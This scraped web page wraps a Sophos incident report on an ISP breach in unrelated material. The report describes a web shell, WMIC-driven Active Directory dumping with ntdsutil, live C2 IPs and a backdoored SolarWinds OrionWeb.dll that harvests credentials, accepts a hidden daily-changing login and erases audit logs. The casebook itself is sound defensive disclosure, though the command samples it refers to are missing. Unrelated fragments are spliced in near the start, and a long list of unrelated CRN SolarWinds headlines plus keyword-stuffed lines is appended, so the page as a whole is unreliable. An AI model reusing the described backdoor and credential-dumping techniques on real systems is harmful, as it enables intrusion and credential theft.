Solarwinds Sophos



Please note: Although elements of this story may seem connected to the recent SolarWinds Sunburst attack, we have not found any concrete evidence that these two incidents are related.

Customer profile: An internet service provider and telecommunications organization based in the USA with approximately 1700 devices.

The Sophos Managed Threat Response (MTR) team provides 24/7 threat hunting, detection, and response capabilities delivered by an expert team as a fully-managed service. Sophos Rapid Response provides emergency remote incident response for active incidents.

Setting the scene

The organization in question came to Sophos Rapid Response after falling victim to a Ragnar Locker attack in early 2020. A ransomware payload was delivered manually by a highly capable group at around 2 a.m., while admins were asleep, hitting as many computers as they could in quick succession.

The SolarWinds attack – dubbed Solorigate by Microsoft and Sunburst by FireEye – starts out when an enterprise downloads an update. As it turns out, SolarWinds recommended that enterprises exclude this update process from anti-malware checks. The SolarWinds Orion tool helps enterprises monitor their networks. Sophos Application Control detects all versions of SolarWinds Orion as “SolarWinds MSP Agent”. Application Control is an optional setting – read the Help Guide for instructions on how to enable it, and add SolarWinds to the list of apps you want to block. Labs detections: List of detections and IOCs.

They hit hundreds.

FireEye publishes details of SolarWinds hacking techniques, gives out free tool to detect signs of intrusion Instructions for spotting and keeping suspected Russians out of systems Kieren McCarthy in San Francisco Tue 19 Jan 2021 // 20:42 UTC. The Sophos Client Firewall does not need any ports to be opened. Sophos Update Manager (SUM) SUM uses TCP port 80 for connections to an HTTP warehouse, and the NetBIOS ports for connections to a warehouse using UNC.

Sophos Rapid Response was brought in to help identify, contain and neutralize the threat. It took the team less than two days to resolve the active threat and over the following days incident responders were able to ascertain the threat actor had entered the network two months prior to the ransomware attack.

With the Ragnar group removed from their network, the customer transitioned to the full MTR service in Notify mode with our security operations team watching over them 24/7.

While the pressing threat of Ragnar Locker was out of the picture, in November 2020 another threat actor stepped into view…

Sneaking over WMI

Increasingly, threat actors like to pack light when on a mission. They don’t bring their own tools and prefer to “live off the land.” They take advantage of capabilities built into operating systems, like Microsoft Windows, to evade detection.

Windows Management Instrumentation, or WMI for short, is a feature that enables remote management and automation of administrative tasks. It’s designed to ease the pains of managing large enterprise environments with an overwhelming number of computers.

But in the hands of a threat actor, WMI offers quite the rich toolbox to achieve a number of wide-ranging goals. And with WMIC, the command line interface for WMI, adversaries can write simple yet powerful one-line instructions.

For example, running Notepad on a remote computer:

Or listing all the local user accounts on a computer:

Hunting for abuse of WMI is essential, but discerning the difference between legitimate use of WMI and malicious use is no easy task, often requiring a keen eye towards the context of the commands. What commands came before? What commands came after? What is the intent?

These are the questions our MTR operators ask themselves as a number of suspicious looking WMI commands are identified in the customer’s network, all taking place in quick succession, during a routine threat hunt alongside researchers from SophosLabs.

Hunting for threat actors

The threat hunters see the first red flag. WMIC was used to instruct remote computers to launch commands. This alone is suspicious, but where did the commands come from?

Looking at the hierarchy, wmic.exe was executed by cmd.exe, the Windows Command Prompt. And cmd.exe was executed by w3wp.exe, a worker process for Microsoft IIS – a web server.

A web server. Surely no measured admin would launch administrative commands to other servers from their own web server?

And what is going on in this command seen on the web server?

WMIC calls out to a remote computer, authenticated with credentials, to create a new process and execute a script called backup.bat. On its own, it’s not terribly suspicious. But given that this was initiated by a web server worker process, we need to dig deeper. What is backup.bat?

MTR finds another troubling command.

Combined with the context of the previous command, it is clearly suspicious to see PowerShell (another Microsoft task automation and configuration management tool) creating a webclient to “downloadfile” from an unknown host, a file called “update”.

Before continuing, an MTR operator sends the first notification to the customer and engages their admin team.

The operator shares the observed WMIC commands as well as the servers and users associated with the commands, with guidance to reset those user passwords and to use Sophos Intercept X to isolate the servers from the rest of the network. Additionally, that strange IP address needs blocking on their firewall.

On with the investigation.

Looking back in time to the preceding commands, the picture becomes clearer.

That’s no backup command. A .bat file is a Batch script, the classic way of bundling Windows commands together rather than running each by hand.

Echo typically prints a line of text to the screen (i.e. the command terminal) however the > symbol is a redirect. Instead of writing the text mkdir … to the terminal, it’s writing to a file on a remote system.

The threat actor built a script on a remote computer. And they had run it.

First it creates a new “tmp” folder in the Windows temporary directory (where things are put when it doesn’t matter if they disappear later on). Next it uses ntdsutil.exe

To a veteran threat hunter, the threat actor’s goal is clear.

Credential access to elevate privileges

Ntdsutil is short for NT Directory Services Utility. It is a tool for interacting with Active Directory servers, Microsoft’s centralized suite of technologies responsible for authenticating and authorizing users and computers in a Windows domain.

The arguments 'ac i ntds' ifm 'create full …' writes a full dump, a copy, of the entire Active Directory database intended for the legitimate purpose of domain controller deployment using the “install from media” option.

This actor tried to get their hands on credentials, and that variant of the command is often used by threat actors who have access to the domain controller but don’t yet have domain admin credentials.

They tried to elevate privileges. And they were caught red-handed.

An operator gets back in touch with the customer to fill them in with the latest discoveries. The customer initiates domain-wide password resets. Better to be safe than sorry.

With the malicious IP blocked, all passwords reset, and those servers isolated, the threat actor is dead in the water.

But it is still a mystery how they orchestrated these commands. Where is the initial point of entry?

What did they do on that webserver?

Web shells

Public webservers are inherently risky. Not only do they face the internet, making them a prime target for an adversary’s initial intrusion into an organization’s network, it’s normal for them to communicate with a wide range of IP addresses never seen before.

All that web traffic, all that noise, makes web servers a wonderful place to hide and launch commands. Only a keen eye will spot that needle amongst the hay. Especially if you’re only looking at network traffic.

Thankfully, MTR collects endpoint telemetry as well as network telemetry, providing rich data to contextualize anything that might be found.

Looking over all the commands the threat actor ran on the server, a pattern emerges.

This command called out to a remote server to copy a file called big.fm from the tmp directory we saw earlier. Sadly, “Big FM” is not the name of the threat actor’s favorite Top 40 radio station, it’s what the threat actor named the Active Directory database dump.

What sticks out in this command, and many others they ran, is they only copied files to a particular folder on the webserver inside f:sites. Almost as if this was the only folder they had permissions to access. A folder where the website code resides.

This smells like a web shell.

Looking inside f:sites our MTR operator finds a lonely looking file called about.aspx. Active Server Page Extended (ASPX) is a framework for writing dynamic websites. Taking a look over the code, our operator observes that the web page will receive encoded web requests and send the decoded request to cmd.exe, the Windows command prompt.

This is a web shell.

But why wasn’t it detected earlier?

Grabbing a copy of the file, MTR sends this immediately to SophosLabs for deeper analysis. Even as the file passes through our automated analysis systems, it’s clear this web shell variant has never been seen before. SophosLabs researchers quickly tear it apart and publish detections for this new variant, protecting all our customers around the globe from this web shell should it be used again.

At the time of writing this article we are the only vendor with a detection published for this web shell variant (detected as Troj/WebShel-H). The file hash is in the IOCs table at the bottom of this article.

With the web shell neutralized (hopefully along with the threat actor’s access), our operators move their focus to answering several important questions: Where did this web shell come from? What else was it used for? And what was the file update that the threat actor downloaded?

OrionWeb.dll

Scouring historic telemetry gathered by MTR since the service’s technology was deployed shows no signs of when the web shell was installed. Plenty of file accesses and timestamp modifications are observed, but it’s clear the web shell was deployed before Rapid Response had been engaged and our telemetry collection began.

This is a dead end.

Looking to what events preceded the download of the file update prove to be more fruitful albeit concerning including another request to a different C2 – http://216[.]243.39.167:8090/ – to fetch another version of the file.

The following command is observed:

Whatever update is, it has been used to replace a component of SolarWinds Orion called OrionWeb.dll.

Time to investigate this DLL.

DLLs are dynamic-link libraries, bundles of executable code that are called upon by applications, implementing various features and capabilities of an application. One can’t simply swap out a DLL with something completely different without causing an application to crash or throw lots of errors.

This needs expert eyes to investigate. MTR shares a sample with SophosLabs for reverse engineering and analysis.

This sample is not cryptographically signed, which is odd for a DLL purporting to be from a reputable vendor.

Digital signatures are a vital part of the trust model for Microsoft Windows. By using strong cryptography, these signatures enable both the authenticity of a file, confirming it is from who it says it is from, as well as the integrity of a file, confirming it has not been modified or corrupted in some way.

If someone were to modify this DLL, the digital signature would no longer validate the file integrity. But if the signature is entirely removed, there’s nothing to use to validate the file integrity at all.

MTR compares the file to a known-good copy of OrionWeb.dll and it is clear this file was and should be signed. Who removed the signature? And why?

OrionWeb.dll is a .NET assembly, written in C# (pronounced “C sharp”). C# is a Microsoft programming language that can easily take advantage of the capabilities of the .NET (“dotNET”) framework, and .NET is Microsoft’s powerful framework for writing applications for their platforms and interfacing with various Microsoft technologies.

One of the benefits of .NET assemblies is that they can be debugged and modified far easier than traditional compiled executables. One can open them up in a variety of tools like dnSpy and read and change the code they contain.

SophosLabs fully decompile the suspicious DLL and compare it to a known-good sample using the popular diff application WinMerge, a tool that enables file comparison and highlights the differences between them.

But as SophosLabs begin to dig into what had been changed, the changes seem incredibly minor. For instance, where the class of code LdapAuthentication previously inherited the other classes ILdapAuthentication and IDisposable in that order, the order was reversed in the suspicious sample.

Reviewing many of the other classes of code in the files, this same pattern of change is observed – parameters swapped around for no obvious reason. Anyone quick to run their eye over these changes would rightfully assume that the software developer has just refactored (i.e. reorganized) their code and nothing suspicious or malicious is present.

Yet given the context of how this file was discovered, SophosLabs and our operators push on with analyzing the sample to try and discover why this different DLL is so important to them that they needed to replace the original with it.

Eventually a discovery is made in the ValidateUser function (in SolarWinds.Orion.Web.OrionMembershipProvider). A chunk of code has been inserted. And it completely changes the behavior of the function.

This SolarWinds Orion server was backdoored!

A Hidden Backdoor

The original ValidateUser function was quite simple – it would be called with a username and password and then, behind the scenes, it would call another function called InternalValidateUser that would do the heavy lifting of authenticating the user.

However, the actor behind this threat added a lot of extra logic to the ValidateUser function.

First, a try/catch pattern was inserted on lines 5 and 54 with the catch block empty. This pattern ensures that any errors that may occur in the try block are suppressed and don’t cause the whole application to crash or print out errors that may reveal something is awry.

Next, a StreamWriter was added on line 7 which would write text to a seemingly randomly named file in the C:UsersDefaultAppDataLocalTemp directory. Any provided username and password would be written to the file, encrypted with a simple binary XOR and Addition cipher with hard coded keys.

The adversary wanted to continuously capture a stream of valid usernames and passwords for SolarWinds Orion.

After that, a conditional if statement was inserted on line 21 which looked for when the provided username is _system. A username that did not exist in the application’s database. A username only the adversary would know about.

Within the if statement were several instructions to access the application’s SQL database and delete the audit logs that would have revealed any usage of this _system username. The threat actor clearly had knowledge of how OrionWeb functions and how best to cover their tracks.

A text string was then constructed on line 57 and 58 that would take the number of days since epoch – a specific point in time which is counted upwards from to describe the current date/time. Effectively this string is the number of days since January 1st 1970. Around the number of days since epoch, 80CD1DB_ and _0F90D2 are added, e.g. 80CD1DB_42745_0F90D2.

But why would a dynamic text string be needed, one that changes every single day? The answer soon becomes clear.

The final modification was in the return statement on line 59.

The original statement would call the InternalValidateUser function. Inferring from the changes, this function would either return True or False (for either a successful or unsuccessful authentication). Yet the adversary had added two additional ways for the ValidateUser function to return True. If the password is this dynamic text string, or if the username is “_system” and the password is also the dynamic text string.

Sophos

The adversary implanted a custom, dynamic password and username that only they would know about and ensured their usage of these credentials would never end up in the SolarWinds Orion audit logs.

And then another malicious injection is found.

Lurking in the GetLdapIdentity function (in SolarWinds.Orion.Web.OrionMixedModeAuth), SophosLabs discover the following code:

Similar to the StreamWriter observed above, the functionality intercepts credentials as they are being used by the application and encrypts and writes them to another seemingly randomly named file. But this time the adversary is stealing LDAP, Lightweight Directory Access Protocol, credentials which are used for authenticating with directory services like Microsoft Active Directory.

The adversary wanted to continuously capture a stream of valid usernames and passwords for the customer’s domain, not just for SolarWinds Orion.

Thankfully, the affected hosts are already isolated. MTR confirms with the customer that these hosts are taken offline and are rebuilt to ensure no backdoor remains in their network.

The Big Picture

The sequence of events is now clear:

  • The threat actor gained access to the web server and installed a web shell to send commands and orchestrate the rest of the attack
  • A backdoored version of OrionWeb.dll was downloaded from their C2 server. Additional logic was added to authenticate the username “_system” with a dynamic password that would change every day and the digital signature of the file removed.
  • OrionWeb.dll was replaced with their backdoored version.
  • Discovery was performed and domain controllers accessed to create a full dump of Active Directory to use for privilege escalation or to exfiltrate.

Given the recent supply chain attack on SolarWinds, this attack is certainly of note. However, we could not identify concrete evidence that the two are connected. The C2s, web shell, and DLL used in this attack are not ones we have observed before, outside of this single incident, nor have we observed them used since.

This style of attack is not specific to SolarWinds Orion and does not rely upon the exploitation of a vulnerability in its code. A threat actor can reverse engineer and maliciously modify a .NET assembly using freely available tools with no requirement for source code access.

The threat actor behind this attack is clearly highly skilled and capable. Their playbook of identifying viable .NET assemblies to backdoor underlines the importance of threat hunting, as well as application allowlisting and file integrity monitoring (both available in Sophos Intercept X Advanced for Server).

We hope the details shared through this casebook as well as the IOAs and IOCs below enable threat hunters around the globe to look for similar malicious modifications of OrionWeb.dll and other .NET assemblies, which will aid in better protection for all.

Learn more

Sophos solarwinds orion

For more information on the Sophos MTR service visit our website or speak with a Sophos representative.

If you prefer to conduct your own threat hunts Sophos EDR gives you the tools you need for advanced threat hunting and IT security operations hygiene. Start a 30-day no obligation trial today.

IOAs / IOCs

DescriptionIndicator
Web shell SHA256 (about.aspx)f39dc0dfd43477d65c1380a7cff89296ad72bfa7fc3afcfd8e294f195632030e
Sophos detection for web shellTroj/WebShel-H
C2 URLshttp://98.225.248.37:8090
http://216.243.39.167:8090
C2 IPv4s98.225.248.37
216.243.39.167
Backdoored OrionWeb.dll SHA256a25fc5af86296dcd5bb41668443a36947bccd17a1687f9b118675f1503b3e376
Sophos detection for .dllMal/Generic-S + Troj/MSIL-QJK

MITRE ATT&CK

ID Tactic Technique
T1047ExecutionWindows Management Instrumentation
T1059.001/.003ExecutionCommand and Scripting Interpreter
T1505.003PersistenceServer Software Component: Web Shell
T1554PersistenceCompromise Client Software Binary
T1078.002Privilege EscalationValid Accounts: Domain Accounts
T1070.004/.006Defense EvasionIndicator Removal on Host
T1003.003Credential AccessOS Credential Dumping: NTDS
T1556Credential AccessModify Authentication Process
T1087.002DiscoveryAccount Discovery: Domain Account
T1570Lateral MovementLateral Tool Transfer
T1056.003CollectionInput Capture: Web Portal Capture
T1071.001Command and ControlApplication Layer Protocol: Web Protocols
T1571Command and ControlNon-Standard Port

Intercept X EDR

Solarwinds Sophos

Live Discover Query

Peter Mackenzie: In Sophos Rapid Response, we would use the query below to get started, this has 3 variables (begin, end, cmd) so you can set the date range you are looking at as well as the command you are looking for. For you example you might start by looking for the string: % wmic /user:'%”%

Allowing for a wildcard at the start and end, as well as for any username. This would likely bring back any results where wmic was being used with someone’s credentials. The query itself brings back lots of useful information from our journals, including when the file was created, and which user executed the command.

Acknowledgements

I would like to thank (in no particular order) Fraser Howard, Guido Denzler, Gabe Renfro, Jordon Carpenter, Tyler Wojcik, Jordan Konicki, Steven Lott, Mat Gangwer, Alemdar Halis, and Savio Lau for their efforts in detecting, investigating, and responding to this novel threat.

The manual supply chain attack against SolarWinds’ Orion network monitoring platform has sent shockwaves throughout the world, with suspected Russian government hackers gaining access to U.S. government agencies, critical infrastructure entities and private sector organizations.

The injecting of malicious code into Orion between March and June 2020 allowed hackers believed to be with the Russian intelligence service, or APT29, to compromise Microsoft and FireEye, as well as U.S. Departments of Defense, State, Treasury, Homeland Security and Commerce, according to reports from Reuters and others.

The U.S. Cybersecurity and Infrastructure Security Agency (CISA) ordered all federal civilian agencies Sunday to power down SolarWinds Orion products until all hacker-controlled accounts and identified persistence mechanisms have been removed. CISA said it has evidence of additional initial access vectors beyond SolarWinds Orion, but noted those other intrusion methods are still being investigated.

Michael Dell: Public Cloud Isn’t More Secure Than On-Premise
‘The things that led to a lot of these attacks are human-induced that can occur in a public cloud, can occur in a private cloud – it can occur anywhere,’ says Dell Technologies CEO Michael Dell.

Mimecast Axes SolarWinds Orion For Cisco NetFlow After Hack
Mimecast has decommissioned its SolarWinds Orion software and replaced it with a Cisco NetFlow monitoring system after hackers compromised a Mimecast certificate used for Microsoft authentication.

Microsoft’s Brad Smith Drags AWS, Google Over SolarWinds Response
‘There are other companies that... have not even alerted their customers or others that they were a victim of a SolarWinds-based attack. These are companies where their own infrastructure was used to launch the attack,’ says Microsoft’s Brad Smith.

AWS: SolarWinds Hackers Used Our Elastic Compute Cloud
‘The actors used EC2 just like they would use any server they could buy or use anywhere (on-premises or in the cloud). And, in fact, the actors did use several different service providers in this manner,’ AWS tells CRN.

SolarWinds To Spend Up To $25M On Security Following Attack
SolarWinds says the money will be put toward security initiatives as well as used to cover higher costs around both insurance and professional fees stemming from the massive cyberattack.

Partners: AWS Must Come Clean On Role In SolarWinds Hack
‘I do wonder whether AWS has made a judgment error in not coming out to publicly defend their position in this high-profile case with such far reaching consequences,’ says Karl Robinson of AWS partner Logicata.

10 Boldest Statements From The SolarWinds Senate Hearing
Senators and tech executives discussed how the SolarWinds hackers used AWS’ infrastructure, took advantage of Microsoft’s authentication process, dwelled in FireEye’s systems and remained undetected for months.

U.S. Senators: AWS Infrastructure Used In SolarWinds Attack
‘The operation we’ll be discussing today uses [Amazon’s] infrastructure, [and], at least in part, required it to be successful. Apparently they were too busy to discuss that here with us today,’ says Sen. Marco Rubio, R-Fla.

Solarwinds

U.S. Plans Russian Sanctions For SolarWinds Breach: Report
The Biden administration plans to classify the SolarWinds campaign as ‘indiscriminate’ and ‘disruptive’ to distinguish it from espionage activities the U.S. conducts against adversaries, The Washington Post reported.

Microsoft On-Premises Warning: Customers Must Protect Their Own Identity Infrastructure
‘We were also reminded of the importance of cloud technology over on-premises software. Cloud technologies like Microsoft 365, Azure and the additional premium layers of services available as part of these solutions improve a defender’s ability to protect their own environment,’ writes Vasu Jakkal, Microsoft’s corporate vice president of security, compliance and identity, in a blog post.

SolarWinds Hackers Kept Going After Microsoft Until January
The SolarWinds hackers first viewed a file in a Microsoft source repository in November, and were able to download source code for its Azure, Exchange and Intune cloud-based products.

SolarWinds MSP Building New IT Systems Prior To N-able Launch
‘As we look to design the new N-able systems, we‘re going to have the benefit of all that [threat actor] knowledge and these world class experts to help us design this,’ says SolarWinds MSP President John Pagliuca.

SolarWinds MSP Hunts For New Security Chief Following Split
‘Tim [Brown, VP of Security] has been a fantastic advisor to the 25,000 MSPs that we have. So, we’re bummed. But we understand. So, we’re looking to see if we can clone him,’ says SolarWinds MSP President John Pagliuca.

10 Bold Statements From SolarWinds MSP After The Orion Hack
From comments on switching up CEOs and weeks of silence to building new IT systems and giving MSPs free security products, here’s a look at 10 notable remarks made by SolarWinds MSP President John Pagliuca and VP of Security Tim Brown.

SolarWinds Hacked From Inside U.S., 100+ Orgs Compromised
‘As a country, we choose to have both privacy and security. [As a result], the intelligence community largely has no visibility into private sector networks,’ says Anne Neuberger, a top Biden administration cybersecurity official.

Microsoft: No Evidence SolarWinds Was Hacked Via Office 365
‘The wording of the SolarWinds 8K [regulatory] filing was unfortunately ambiguous, leading to erroneous interpretation and speculation, which is not supported by the results of our investigation,’ Microsoft said Thursday.

Alex Stamos Attributes SolarWinds Hack To Russian Intel Service
New SolarWinds consultant Alex Stamos says the Russian foreign intelligence service is responsible for the massive hacking effort, although SolarWinds itself isn’t attributing the attacks to a specific group or nation.

SolarWinds CEO Confirms Office 365 Email ‘Compromise’ Played Role In Broad Based Attack
SolarWinds CEO Sudhakar Ramakrishna has verified suspicious activity in its Office 365 environment, with a company email account compromised and used to access accounts of targeted SolarWinds staff in business and technical roles.

Mimecast To Lay Off 80 Workers Weeks After Disclosing Hack
Mimecast CEO Peter Bauer says cutting 4 percent of its workforce will help the company provide more resources to enterprises while leveraging automation and efficiency for mid-market and SMB customers.

Kevin Mandia: Discovering SolarWinds Hack ‘Validates Our Intelligence and Expertise’
‘This breach got everybody to recognize there‘s a way to compromise some of the most secure organizations on the planet in a surreptitious way, and that alarmed people,’ says FireEye CEO Kevin Mandia.

Chinese Hackers Exploit SolarWinds To Steal Federal Payroll Info: Report
Suspected Chinese hackers took advantage of another SolarWinds Orion vulnerability to spread across networks and break into computers at the National Finance Center and other U.S. agencies, Reuters said.

Sophos CEO Kris Hagerman’s 10 Boldest Remarks From Best Of Breed Virtual Winter 2021
From surging sales and profitability and securing the supply chain to combating complexity and doubling down on detection and response, here’s a look at 10 notable statements made by Sophos CEO Kris Hagerman.

SolarWinds Hack ‘One Of The Most Dramatic’ In Last Decade: Sophos CEO
‘You cannot think about your security only in the context of, ‘How well am I secured?’ You’ve got to go beyond that to say, ‘How well am I secured and how well am I securing everything that I connect to?’’ says Sophos CEO Kris Hagerman.

Fidelis Targeted By SolarWinds Hackers After Installing Orion
Fidelis Cybersecurity was a target of interest to the SolarWinds hackers after downloading an evaluation copy of trojanized SolarWinds Orion network monitoring software in May, the company disclosed Tuesday.

Mimecast Breach Linked To SolarWinds Hack, Allowed Cloud Services Access
Mimecast said Tuesday that its certificate compromise was carried out by the same threat actor behind the SolarWinds attack and provided hackers with access to customers’ on-premises and cloud services.

5 Security Vendors That Have Reported Cyberattacks Since December
Five cybersecurity vendors disclosed in recent weeks that hackers have attacked their internal systems, compromised their certificates or attempted to access their email accounts. Here’s a rundown of what happened when.

SolarWinds Hackers Access Malwarebytes’ Office 365 Emails
‘Attackers leveraged a dormant email production product within our Office 365 tenant that allowed access to a limited subset of internal company emails,’ Malwarebytes CEO Marcin Kleczynski wrote in a blog post.

SolarWinds Hack Could Cost Cyber Insurance Firms $90 Million
‘Although the SolarWinds attack is a cyber catastrophe from a national security perspective, insurers may have narrowly avoided a catastrophic financial incident to their businesses,’ says BitSight’s Samit Shah.

5 Things To Know About The Mimecast Hack And Stock Drop
From the type of certificate likely compromised to the impact of this hack on Mimecast’s email security rivals to whether the attack is tied to the SolarWinds breach, here are five big things to know about the Mimecast hack.

Hackers Compromise Mimecast Certificate For Microsoft Authentication
The certificate used to authenticate Mimecast’s Sync and Recover, Continuity Monitor and Internal Email Protect (IEP) products to Microsoft 365 has been compromised by a sophisticated threat actor.

Hackers Taunt FireEye’s Kevin Mandia At Home With Postcard: Report
The FBI is investigating a mysterious postcard sent to CEO Kevin Mandia’s home days after FireEye found initial evidence of a hacking operation on federal agencies and private businesses, Reuters reports.

Sophos

SolarWinds CEO: Attack Was ‘One Of The Most Complex And Sophisticated’ In History
Hackers first accessed SolarWinds in September 2019 and went out of their way to avoid being detected by the company’s software development and build teams, SolarWinds CEO Sudhakar Ramakrishna says.

SolarWinds’ New CEO Will Make These 5 Changes Post-Hack
From resetting privileged credentials and re-signing all digital certificates to manually checking source code and rolling out threat hunting software, here are five critical security improvements new SolarWinds CEO Sudhakar Ramakrishna plans to make.

SolarWinds Fights Back With Chris Krebs, Alex Stamos Hires
‘Armed with what we have learned of this attack, we are also reflecting on our own security practices and seeking opportunities to enhance our posture and policies. We have brought in the expertise of Chris Krebs and Alex Stamos to assist in this review,’ SolarWinds tells CRN.

SolarWinds Hackers Compromise Confidential Court Filings
The Russian hackers behind the SolarWinds attack have apparently compromised the federal courts’ electronic case filing system, putting ‘highly sensitive non-public documents’ at great risk.

SolarWinds To Pay Ex-CEO $312K To Assist With Investigations
SolarWinds has agreed to pay former CEO Kevin Thompson $62,500 for each of the next five months as the embattled company faces a likely wave of lawsuits and government probes into its conduct around the hack.

SolarWinds Hackers Got Into U.S. Justice Department’s Emails
‘At this point, the number of potentially accessed Office 365 mailboxes appears limited to around 3 percent, and we have no indication that any classified systems were impacted,’ the Justice Department announces.

Feds: SolarWinds Breach Is Likely Russian Intel Gathering Effort
Nearly ten U.S. government agencies experienced follow-on activity on their systems after being compromised through a malicious SolarWinds Orion update, the Cyber Unified Coordination Group says.

SolarWinds Hit With Class-Action Lawsuit Alleging Securities Violations
The first class-action lawsuit brought against SolarWinds following its colossal breach accuses the company of making materially false and misleading statements about its security posture throughout 2020.

SolarWinds Hackers Gain Access To Microsoft’s Source Code
One Microsoft account compromised by suspected Russian hackers had been used to view source code in a number of source code repositories, but none of the code itself was altered, Microsoft disclosed Thursday.

Here Are 24 Reported Victims Of The SolarWinds Hack (So Far)
From tech giants, internet service providers and IT solution providers to federal agencies and county governments, here’s a deeper look at 24 of the publicly identified victims of the colossal SolarWinds hack.

CrowdStrike Fends Off Attack Attempted By SolarWinds Hackers
The suspected Russian hackers behind the massive SolarWinds attack attempted to hack CrowdStrike through a Microsoft reseller’s Azure account but were ultimately unsuccessful, CrowdStrike says.

Five Solution Providers Breached By SolarWinds Hackers: Researchers
The SolarWinds hackers called for proceeding with the second stage of their attack on Stratus Networks, Digital Sense, ITPS and Netdecisions, and had an unknown response to compromising Deloitte, Truesec says. Digital Sense said it wasn’t impacted by the campaign since the company doesn’t use SolarWinds.

Top Treasury Email Accounts Exposed In SolarWinds Hack: Report
The hackers performed a complex step inside Microsoft Office 365 to create an encrypted “token” that tricked the Treasury’s system into thinking the hackers were legitimate users, The New York Times said.

Microsoft: A 2nd Group May Have Also Breached SolarWinds
A ‘different threat actor’ may be responsible for the malware known as Supernova that has been found installed in SolarWinds Orion.

Kevin Mandia: 50 Firms ‘Genuinely Impacted’ By SolarWinds Attack
FireEye CEO Kevin Mandia acknowledges the SolarWinds hack ‘is an attack very consistent with’ what the Russian foreign intelligence service is known for, but didn’t want to officially blame the campaign on them.

Intel, Nvidia Swept Up In SolarWinds Attack: WSJ
The chipmakers say they are investigating the impact of downloading a software update containing malicious code for SolarWinds Orion — the trigger that has left many SolarWinds customers vulnerable — though there is no evidence of any negative impact.

Unclassified Treasury Systems Hit By SolarWinds Hack: Mnuchin
‘At this point, we do not see any break-in into our classified systems. Our unclassified systems did have some access,’ Secretary of the Treasury Steve Mnuchin tells CNBC Monday morning.

Trump Downplays SolarWinds Hack, Pompeo Blames Russia
‘Russia, Russia, Russia is the priority chant when anything happens because Lamestream [Media] is, for mostly financial reasons, petrified of discussing the possibility that it may be China (it may!),’ Trump tweeted.

Cisco Hacked Through SolarWinds As Tech Casualties Mount
Roughly two dozen computers in a Cisco lab were compromised through malicious SolarWinds Orion updates, Bloomberg reported. Cisco says there isn’t currently any known impact to its offers or products.

Datto Offers All MSPs Free Scanner To Find Signs Of FireEye, SolarWinds Hack
‘Now is a time to remain vigilant and take an active role in hardening systems against these, now known, tactics,’ Datto CISO Ryan Weeks writes in a blog post announcing the scanner.

VMware Flaw Used To Hit Choice Targets In SolarWinds Hack: Report
A VMware vulnerability that allowed federated authentication abuse was used by the SolarWinds hackers to attack valuable targets, KrebsOnSecurity said. VMware said it didn’t have any indication of this happening.

SolarWinds Should Have Been More ‘Vigilant’: Palo Alto Networks CEO
‘I am not going to give them a free pass,’ says Palo Alto Networks CEO Nikesh Arora. ‘They should have been more vigilant and diligent, but I think this is a very sophisticated, very complex attack. The fact they (the Russians) got in there not only did they do sophisticated things, they also got lucky that this is a piece of software which then went unnoticed for six to nine months, and now it’s embedded in the infrastructure of thousands of customers.’

SolarWinds Hack Compromised 40-plus Microsoft Customers
A decisive plurality – 44 percent – of the Microsoft customers compromised through SolarWinds are actually in the IT sector, and include software and security firms as well as IT services and equipment providers.

Microsoft Breached Via SolarWinds As Scope Of Destruction Widens: Report
Suspected Russian hackers capitalized on Microsoft’s wide use of SolarWinds to infiltrate the software giant, and then used Microsoft’s own products to further their attacks on other victims, Reuters said. Microsoft pushed back on the report.

SolarWinds Deploys CrowdStrike To Secure Systems After Hack
SolarWinds says its breached Orion network monitoring platform now meets the security requirements of U.S. federal and state agencies following the release of a final hotfix Tuesday night.

Solarwinds Sophos Download

Feds: SolarWinds Attack ‘Poses a Grave Risk’ To Government, Business
The U.S. government says it has evidence of additional initial access vectors beyond the SolarWinds Orion supply chain compromise, but noted that those other attack methods are still being investigated.

Solarwinds Sophos Xg

SolarWinds MSP To Revoke Digital Certificates For Tools, Issue New Ones As Breach Fallout Continues
‘I think they’re afraid. They’ve got liability, and they don’t know what to say, so everybody’s told to keep their mouth shut. Instead of being focused on the issue at hand, they’re worried about lawsuits,” SolarWinds MSP partner Rich Delany tells CRN.

SolarWinds Hack ‘One Of The Worst In The Last Decade’: Analyst
‘There are a lot of white knuckles around this attack ... Even though much of it is unknown, right now people are fearing the worst,’ Daniel Ives of Wedbush Securities tells CRN.

Malware Used In SolarWinds Attack Can Now Be Blocked: FireEye
‘Under certain conditions, the malware would terminate itself and prevent further execution... This killswitch will affect new and previous... infections by disabling... deployments that are still beaconing to avsvmcloud[.]com,’ FireEye tells CRN.

Microsoft’s Role In SolarWinds Breach Comes Under Scrutiny
Microsoft has become ensnared in probes surrounding the colossal U.S. government hack, with media reports and company messages focusing on Office 365, Azure Active Directory and a key domain name.

$286M Of SolarWinds Stock Sold Before CEO, Hack Disclosures
Silver Lake and Thoma Bravo said they weren’t aware of the cyberattack at the time of the sale, but didn’t respond to questions about whether they knew Sudhakar Ramakrishna had been selected as SolarWinds’ next CEO.

10 Things To Know About The SolarWinds Breach And Its U.S. Government Impact
From how nation-state hackers evaded detection to why federal agencies were ordered to immediately power down Orion to its impact on the SolarWinds MSP business, here are the most important things to know about the SolarWinds breach.

Homeland Security Latest Breach Victim Of Russian Hackers: Report
A spokesman said the Department of Homeland Security is aware of reports of a breach and is currently investigating the manner. The U.S. Treasury and Commerce Departments were also reportedly hacked.

US Calls On Federal Agencies To Power Down SolarWinds Orion Due To Security Breach
An emergency directive issued by the U.S. government calls on all federal civilian agencies to disconnect or power down SolarWinds Orion IT management tools because they are being used to facilitate an active exploit.

Infected SolarWinds Updates Used To Compromise Multiple Organizations: FireEye
Nation-state hackers gained access to government, consulting, technology and telecom firms around the world through trojanized updates to SolarWinds’ Orion network monitoring tool, according to FireEye .

8 Big Things To Know About The State-Sponsored FireEye Hack
From who’s suspected to be behind the FireEye hack and how they remained hidden, to what FireEye and intelligence officials are doing to minimize the fallout from the attack, here’s a look at what partners need to know.

FireEye Hacked By Nation-State Group Seeking Government Info
‘This attack is different from the tens of thousands of incidents we have responded to throughout the years. The attackers tailored their world-class capabilities specifically to target and attack FireEye,’ says CEO Kevin Mandia.